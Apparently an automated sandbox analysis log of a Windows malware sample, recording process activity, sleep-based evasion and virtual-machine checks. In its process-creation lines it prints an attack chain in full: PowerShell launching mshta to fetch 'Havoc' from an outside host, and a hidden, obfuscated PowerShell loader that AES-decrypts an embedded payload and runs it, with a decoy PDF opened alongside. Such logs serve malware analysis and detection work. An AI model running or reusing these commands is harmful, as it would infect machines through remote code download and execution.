Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1507Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 886Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 968Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 885Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4977Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4733Jump to behavior
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 968 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 885 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3568Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000009.00000002.2474776375.0000021DB7E7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000008.00000002.3415070129.000001549742B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3417918626.000001549CA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000009.00000002.2468649090.0000021DB7ADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB5%SystemRoot%\system32\mswsock.dll1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14Xv1
Source: mshta.exe, 00000006.00000003.2492073213.000002506C0E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/HavocJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '14d9e273dbaaf2d5627390c488d4081506bacf9bb631e3bfb99e89402396a70a33b769921d8e13b74bfe560e44e9ea80141571c8144b00f8dfd5b812560521e806858fabdd53f92ff1af58107b7325097243441eb3d0b85776cb99dbb0477d42cba9e543de9d42c27f5c52600e9295d684a3a713292fd7590d5a9d93a1c7a8c449da6b94034ef5c0876c666b9af696cb12928616d0c543fdf4fa01cd781a0fd3e27c492347cd5958399225168576cba1bcf230f43af6432bd57ae6b38c04ef2a370a6a7a9217af16a8216f99e4e18df0865a002fca560819251c521cbc36b7af93394d9c3b2bf598bca8b7e7af02167aa470c45a1cce0fcfcaf7f27abd86382030ee615d8e88e22fe52ed3be7920c11b0d69789b0869401c0e48dd6b755fe432d03a5a497e5f28eb5e5e44fafa0c505e6623dfe084696f472ca065c02c263eceb0afad35ce69bff06aba1f5b3f0dda7ba73dd774eb332b541081f516b8571c7af7673af3af66aab18b80b1e88ee0c7484102bea4492a97b93c9b25cd23c59c0c19974ee48483a82f0a3dace4b86f4acdf9ebd8241cfe51cfaca8304c421249ac1ed97b0130ee35d8024fc019004642a1048544b0efd18f4ab33955150bb878898726db416d04b2f38f5d64dc34581d0d970265a7861a50c84e3ed14b3b80f48dc0b376fef3ec7781db3abf08d8ca09272df1fdfb6a49276f6b84eb85fd08de40dceca35d65c7e4c6af03bd30e2758ea776531b78ac2a0cdb1152b752476fca117cf49836f1d3f580c7f1efcc3df72889a84719cd9cb0906e4426ab5b5acb90919bb40912d707a2edbfdf4ca474944334791f9cde97423d874dec32d3f51d82d569c9ba9be15f8c8f45ee5e616dc1accf500c07d6397b43d0b7996460b9038754e3bb20065a84c5a0ab1bea09c08f010390d6cf29034533915ff9b0cda4e962b0c9526faedc4c92583151324317ea1f41668164916ef83a708d49d8d387f3a6fc03b4c45b55cc791633a903c424cc97f360459144e8aaad18846ede332ac9d0b0a5da3942e80d30bc64a79d4f1066cbd427aa9967b032410489bf58e552eabe4e56233e9e617de26d133799620abdc2c8a7ee07f161da0b795ba67a3c330626c5ebce6de7cbcbde927a136ce05fa8d0fa0b1ef5b5f880f8c60b77244c5127d2cf5185955bf12936d162404dca8452a25052a660077ffa7a581ab5764bfcaff5ea0e35b323e6b1212e76f58b5497a0d17148e38eb53e7c5672804d7f7f5586a4b9af992e86a8d5d91729bf16373ab1737376149212eca57d5c01799429867a591b0fc2f74593a7bbe6dbe58b9b2f9aece6eede50d4794df2c26135d7c1c53695c710b56db6e7dc5f0dc736a8f4359b0423d09ae8d87a4bbd3d064d552cfc81d3bd7bf66dae7db9f7eba548845afee275e29141fbc37007dc1c4c7d51463745ed37544877624c78476d755254597868556f';function yor ($pajawh){return -split ($pajawh -replace '..', '0x$& ')};$yasaqhf = yor($ddg.substring(0, 2048));$xwh = [system.security.cryptography.aes]::create();$xwh.key = yor($ddg.substring(2048));$xwh.iv = new-object byte[] 16;$rrodudsq = $xwh.createdecryptor();$jpgioi = [system.string]::new($rrodudsq.transformfinalblock($yasaqhf, 0,$yasaqhf.length)); sal fd $jpgioi.substring(3,3); fd $jpgioi.substring(6)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '14d9e273dbaaf2d5627390c488d4081506bacf9bb631e3bfb99e89402396a70a33b769921d8e13b74bfe560e44e9ea80141571c8144b00f8dfd5b812560521e806858fabdd53f92ff1af58107b7325097243441eb3d0b85776cb99dbb0477d42cba9e543de9d42c27f5c52600e9295d684a3a713292fd7590d5a9d93a1c7a8c449da6b94034ef5c0876c666b9af696cb12928616d0c543fdf4fa01cd781a0fd3e27c492347cd5958399225168576cba1bcf230f43af6432bd57ae6b38c04ef2a370a6a7a9217af16a8216f99e4e18df0865a002fca560819251c521cbc36b7af93394d9c3b2bf598bca8b7e7af02167aa470c45a1cce0fcfcaf7f27abd86382030ee615d8e88e22fe52ed3be7920c11b0d69789b0869401c0e48dd6b755fe432d03a5a497e5f28eb5e5e44fafa0c505e6623dfe084696f472ca065c02c263eceb0afad35ce69bff06aba1f5b3f0dda7ba73dd774eb332b541081f516b8571c7af7673af3af66aab18b80b1e88ee0c7484102bea4492a97b93c9b25cd23c59c0c19974ee48483a82f0a3dace4b86f4acdf9ebd8241cfe51cfaca8304c421249ac1ed97b0130ee35d8024fc019004642a1048544b0efd18f4ab33955150bb878898726db416d04b2f38f5d64dc34581d0d970265a7861a50c84e3ed14b3b80f48dc0b376fef3ec7781db3abf08d8ca09272df1fdfb6a49276f6b84eb85fd08de40dceca35d65c7e4c6af03bd30e2758ea776531b78ac2a0cdb1152b752476fca117cf49836f1d3f580c7f1efcc3df72889a84719cd9cb0906e4426ab5b5acb90919bb40912d707a2edbfdf4ca474944334791f9cde97423d874dec32d3f51d82d569c9ba9be15f8c8f45ee5e616dc1accf500c07d6397b43d0b7996460b9038754e3bb20065a84c5a0ab1bea09c08f010390d6cf29034533915ff9b0cda4e962b0c9526faedc4c92583151324317ea1f41668164916ef83a708d49d8d387f3a6fc03b4c45b55cc791633a903c424cc97f360459144e8aaad18846ede332ac9d0b0a5da3942e80d30bc64a79d4f1066cbd427aa9967b032410489bf58e552eabe4e56233e9e617de26d133799620abdc2c8a7ee07f161da0b795ba67a3c330626c5ebce6de7cbcbde927a136ce05fa8d0fa0b1ef5b5f880f8c60b77244c5127d2cf5185955bf12936d162404dca8452a25052a660077ffa7a581ab5764bfcaff5ea0e35b323e6b1212e76f58b5497a0d17148e38eb53e7c5672804d7f7f5586a4b9af992e86a8d5d91729bf16373ab1737376149212eca57d5c01799429867a591b0fc2f74593a7bbe6dbe58b9b2f9aece6eede50d4794df2c26135d7c1c53695c710b56db6e7dc5f0dc736a8f4359b0423d09ae8d87a4bbd3d064d552cfc81d3bd7bf66dae7db9f7eba548845afee275e29141fbc37007dc1c4c7d51463745ed37544877624c78476d755254597868556f';function yor ($pajawh){return -split ($pajawh -replace '..', '0x$& ')};$yasaqhf = yor($ddg.substring(0, 2048));$xwh = [system.security.cryptography.aes]::create();$xwh.key = yor($ddg.substring(2048));$xwh.iv = new-object byte[] 16;$rrodudsq = $xwh.createdecryptor();$jpgioi = [system.string]::new($rrodudsq.transformfinalblock($yasaqhf, 0,$yasaqhf.length)); sal fd $jpgioi.substring(3,3); fd $jpgioi.substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
